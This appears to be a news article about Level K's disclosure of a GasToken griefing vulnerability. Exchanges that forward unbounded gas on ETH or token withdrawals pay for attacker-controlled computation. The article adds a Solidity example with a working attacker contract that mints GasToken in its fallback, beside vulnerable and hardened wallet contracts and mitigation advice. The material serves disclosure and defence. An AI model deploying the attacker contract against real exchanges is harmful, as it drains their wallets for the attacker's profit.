Level K, a developer of DApps and Ethereum smart contracts, recently discovered a vulnerability affecting Ethereum users that allows an attacker to mint large quantities of GasToken at the expense of whoever sends them ETH. The information was published on 21 November. According to the company, the exchanges at risk from this attack have been notified, and they have made changes to their software that prevent such an attack should a bad actor attempt one.
GasToken vulnerability on the Ethereum blockchain
According to the report, the vulnerability arises whenever ether is sent to an address that can execute arbitrary code, because that code runs on gas paid for by the sender of the transaction. This creates a griefing risk. Griefing is an attack carried out to inflict losses on the victim, not primarily to profit the attacker. In the absence of a gas limit on the outgoing transaction, an attacker can grief a sender such as an exchange for an amount of the attacker's choosing, bounded only by the block gas limit.
If the attacker additionally mints GasToken in the same call in which the ETH is received, the griefing turns into a profit for the attacker, since the minting is paid for by the sender and the tokens remain with the attacker.
The report states that the risk is not limited to ETH. Other Ethereum-based transfers, such as ERC-20 and ERC-721 token transfers, may be affected as well: these are contract calls, and an exchange that does not set a gas limit on them may end up paying for far more computation than necessary, to the attacker's advantage.
The report includes the following hypothetical case study:
"In an exploit scenario, Alice runs a cryptocurrency exchange and Bob plans to cause damage to Alice. Bob can easily initiate withdrawals to a contract address under his control whose fallback function is computationally intensive. If Alice does not set a gas limit, she will end up paying the transaction fees from her wallet. With enough transactions, Bob can drain Alice's wallet. If Alice does not have a KYC policy, Bob will be able to create different accounts and get around individual account withdrawal limits. And if Bob wants to make a profit while draining Alice's wallet, he can mint GasToken in his fallback function."
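The Alice/Bob scenario above, as an added example that is not part of Level K's report or code. It shows Bob's recipient contract, whose fallback converts whatever gas the sender forwards into GasToken, beside an unbounded hot-wallet contract and a hardened one that caps the gas a recipient may consume. The IGasToken interface, the MINT_GAS and RESERVE_GAS figures, and all contract names are assumptions made for illustration; the GasToken address is supplied at deployment rather than hardcoded.

```solidity
pragma solidity ^0.5.0;

// Assumed minimal interface of a GasToken contract: GST1 and GST2 both
// expose mint(uint256) and are ERC-20 compatible, so transfer() exists too.
interface IGasToken {
    function mint(uint256 value) external;
    function transfer(address to, uint256 value) external returns (bool);
}

// Bob's side: the contract he registers as his withdrawal address.
contract GriefingRecipient {
    IGasToken public gasToken;
    address public owner;
    // Assumed average gas spent per minted token; tune to the token in use.
    uint256 public constant MINT_GAS = 40000;
    // Gas kept back so the fallback returns successfully. If it ran out of
    // gas the mint would revert: Alice would still pay, but Bob would not profit.
    uint256 public constant RESERVE_GAS = 60000;

    constructor(IGasToken token) public {
        gasToken = token;
        owner = msg.sender;
    }

    // Fallback: accept the ether, then turn nearly all forwarded gas into
    // GasToken owned by this contract. The sender (Alice) pays for every
    // unit of it. Under a 2300-gas stipend (transfer/send) the guard fails
    // and the fallback does nothing beyond accepting the ether.
    function () external payable {
        uint256 g = gasleft();
        if (msg.value > 0 && g > RESERVE_GAS + MINT_GAS) {
            gasToken.mint((g - RESERVE_GAS) / MINT_GAS);
        }
    }

    // Bob later collects the ether and the minted tokens from his own account.
    function sweep(uint256 tokens) external {
        require(msg.sender == owner, "not owner");
        require(gasToken.transfer(owner, tokens), "token transfer failed");
        msg.sender.transfer(address(this).balance);
    }
}

// Alice's side, vulnerable: call.value() forwards all remaining gas (minus
// the 1/64 the EVM retains under EIP-150) to whatever code lives at `to`.
contract HotWalletUnbounded {
    address public operator;

    constructor() public payable { operator = msg.sender; }

    function withdraw(address payable to, uint256 amount) external {
        require(msg.sender == operator, "not operator");
        (bool ok, ) = to.call.value(amount)("");
        require(ok, "send failed");
    }
}

// Alice's side, hardened: an explicit, operator-set cap on the gas a
// recipient may consume. Whatever the recipient does, Alice's fee for one
// withdrawal is bounded by (21000 + this wallet's own overhead + withdrawGas)
// multiplied by the gas price.
contract HotWalletBounded {
    address public operator;
    uint256 public withdrawGas;

    constructor(uint256 cap) public payable {
        operator = msg.sender;
        withdrawGas = cap;
    }

    function setWithdrawGas(uint256 cap) external {
        require(msg.sender == operator, "not operator");
        withdrawGas = cap;
    }

    function withdraw(address payable to, uint256 amount) external {
        require(msg.sender == operator, "not operator");
        // Option A: to.transfer(amount) forwards only the 2300-gas stipend.
        // Immune to griefing, but rejects recipients (e.g. multisig wallets)
        // whose fallback legitimately needs more gas.
        // Option B: forward a bounded amount chosen by the operator.
        (bool ok, ) = to.call.gas(withdrawGas).value(amount)("");
        require(ok, "send failed");
    }
}
```

Most exchanges send withdrawals from an externally owned account rather than from a contract, and the same rule applies there: set the transaction's gas limit explicitly instead of taking the result of eth_estimateGas, because estimation against a recipient like GriefingRecipient simply reports however much gas the recipient is willing to burn, up to the block gas limit. A cheap operational check is to alert on outgoing withdrawals whose gas used approaches the limit that was set.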
Level K states that all exchanges that may be affected by this attack were notified privately and encouraged to take precautions against possible attacks. It sent this notification to as many cryptocurrency exchanges as it could reach, and those exchanges have implemented patches. Since the initial disclosure, Level K has published more information on the vulnerability and on the steps that can be taken to contain it.